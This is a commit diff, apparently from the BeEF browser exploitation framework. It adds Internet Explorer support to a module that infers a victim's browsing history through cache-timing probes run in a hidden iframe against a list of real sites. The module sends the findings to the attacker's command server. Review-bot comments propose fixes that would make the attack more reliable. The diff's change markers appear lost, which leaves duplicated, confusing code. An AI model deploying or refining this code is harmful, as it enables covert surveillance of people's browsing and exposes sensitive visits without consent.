Fix Issue 88 - Working for IE and Firefox

This commit is contained in:
root
2012-03-11 11:38:47 -04:00
parent a0c11fa695
commit 847b798e0a
3 changed files with 193 additions and 88 deletions


@@ -14,7 +14,6 @@
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
@@ -24,6 +23,9 @@ hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
@@ -39,56 +41,104 @@ function timer_interrupt() {
}
}
window.addEventListener('message', timer_interrupt, false);
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
/**********************
* MAIN STATE MACHINE *
@@ -106,33 +156,70 @@ var start, stop, urls;
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
setTimeout(wait_for_read, 1);
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read, 1);
setTimeout(wait_for_read2, 0);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
sched_call(wait_for_noread);
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
@@ -140,44 +227,43 @@ function navigate_to_target() {
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,5000);
}
}
function reload(){
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
function maybe_test_next() {
frame_ready = false;
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
@@ -200,30 +286,48 @@ function maybe_test_next() {
attempt++;
perform_check();
}
} //else {
//en = (new Date()).getTime();
//}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (navigator.userAgent.indexOf('Firefox/') == -1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.');
//alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' +
// 'Versions for other browsers can be found here:\n' +
// 'http://lcamtuf.coredump.cx/cachetime/');
}
else{
target_off = 0;
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
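Review bot: The `message` listener registered inside the `isFF()` branch right after `timer_interrupt`'s closing brace accepts posts from any source, yet `navigate_to_target` points the hidden frame `f` at third-party URLs, so any page loaded there can post to its parent and fire `exec_next` before the scheduled tick, throwing the state machine out of step. Since `sched_call` always posts the constant `'123'` with target `'*'`, the handler can reject everything else: `if (event.source !== window || event.data !== '123') return;` as the first statement of `timer_interrupt`, whose body starts above this hunk (assuming it receives the event as its first argument). Separately, `isIE` and `isFF` are declared at the top of the file but never read in these hunks; `beef.browser.isIE()`/`isFF()` are re-evaluated on every 0 ms tick in `perform_check`, `wait_for_read`, `navigate_to_target`, `wait_for_noread` and `maybe_test_next`, so setting the two flags once in `start_stuff` and branching on them would be cheaper and easier to follow. With markers lost on this page it also looks like a third, unconditional `var targets`/`TIME_LIMIT`/`MAX_ATTEMPTS` block may survive after the two browser branches; if it does, it silently overrides the IE values, so worth confirming against the raw diff.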


@@ -19,7 +19,7 @@ beef:
enable: true
category: "Browser"
name: "History Extraction"
description: "This module will retrieve the session cookie from the current page."
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF"]
working: ["FF","IE"]
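Review bot: The new `description` reads awkwardly ("will retrieve rapid history extraction") and does not describe what the module actually returns; `description: "This module performs rapid history extraction through non-destructive cache timing, reporting which of a fixed list of sites appear in the browser cache.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"` states the contract more plainly. The `working` list now matches the `isFF() || isIE()` gate in `start_stuff`, which is good; if the IE path relies on the shorter `TIME_LIMIT`/`MAX_ATTEMPTS` values, a one-line note here that IE results are single-attempt would help operators read the output.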


@@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_history < BeEF::Core::Command
def post_execute